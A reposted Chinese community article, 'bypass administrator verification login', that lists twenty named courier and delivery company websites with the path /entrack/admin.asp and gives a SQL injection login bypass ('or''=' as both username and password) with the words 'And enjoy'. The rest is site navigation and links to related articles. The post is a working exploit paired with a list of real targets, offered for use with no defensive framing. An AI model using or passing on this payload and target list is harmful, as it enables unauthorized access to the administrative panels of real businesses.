AI 助理
备案控制台
开发者社区 云计算 文章 正文

绕过管理员验证登陆!

2017-11-08 1092
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
 site:
# 1-packageexpress.net/entrack/admin.asp
# 2-mecourier.com/entrack/admin.asp
# 3-cannondelivery.com/entrack/admin.asp
# 4-cannondelivery.com/entrack/admin.asp
# 5-barefootmailmoms.com/entrack/admin.asp
# 6-rudysrush.com/entrack/admin.asp
# 7-sunrisedeliverykc.com/entrack/admin.asp
# 8-rfmcourier.com/entrack/admin.asp
# 9-dixiefreight.com/entrack/admin.asp
# 10-atlasdelivery.com/entrack/admin.asp
# 11-atlantadash.com/entrack/admin.asp
# 12-directlogisticstransport.com/entrack/admin.asp
# 13-cityexpressinc.com/entrack/admin.asp
# 14-redlinecourier.com/entrack/admin.asp
# 15-callcouriernow.com/entrack/admin.asp
# 16-korucutech.com/entrack/admin.asp
# 17-efficientdeliveryservice.com/entrack/admin.asp
# 18-actfastdelivery.com/entrack/admin.asp
# 19-cannondelivery.com/entrack/admin.asp
# 20-otwcourier.com/entrack/admin.asp
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
There are lots of sites

How exploitation

Exploit
http://server/[path]/admin.asp

User name : 'or''='
Password :  'or''='

And enjoy



本文转自enables 51CTO博客,原文链接:http://blog.51cto.com/niuzu/590856,如需转载请自行联系原作者


科技小先锋
目录
相关文章
潇湘信安
|
安全 Shell API
绕过反病毒添加管理员用户小结
绕过反病毒添加管理员用户小结
潇湘信安
195 0
绕过反病毒添加管理员用户小结
游客az7yd3cqma4aw
|
安全 数据安全/隐私保护
靶机实战-密码重置与身份认证失效漏洞
靶机实战-密码重置与身份认证失效漏洞
游客az7yd3cqma4aw
329 0
靶机实战-密码重置与身份认证失效漏洞
拉格朗日(Lagrange)
验证登陆案例
验证登陆案例
拉格朗日(Lagrange)
125 0
肥晨
|
存储 安全 数据库
WEB安全讨论-表单登录是先验证验证码还是密码
笔记
肥晨
232 0
WEB安全讨论-表单登录是先验证验证码还是密码
运维朱工
|
存储 监控 安全
zabbix最新漏洞,可绕过认证登陆!
Zabbix对客户端提交的`Cookie`会话存在不安全的存储方式,导致在启动`SAML SSO`认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现`RCE`。
运维朱工
676 0
zabbix最新漏洞,可绕过认证登陆!
熟透的蜗牛
|
前端开发 JavaScript 数据安全/隐私保护
Validform验证修改密码
前端页面、验证原密码后台代码、提交表单js代码、提交表单后台代码。
熟透的蜗牛
175 0
金色海洋
[导入]用户登录及验证用户是否登录的代码
用户登录及验证用户是否登录的代码文章来源:http://blog.csdn.net/jyk/archive/2006/08/15/1067382.aspx
金色海洋
705 0
玄学酱
|
网络虚拟化 数据安全/隐私保护
3.6. 用户验证
玄学酱
1222 0
玄学酱
|
网络虚拟化 数据安全/隐私保护
22.6. 用户验证
玄学酱
1192 0
老朱教授
|
.NET Windows 开发框架
模拟IE登录一个需要(windows身份)验证的网站
老朱教授
1292 0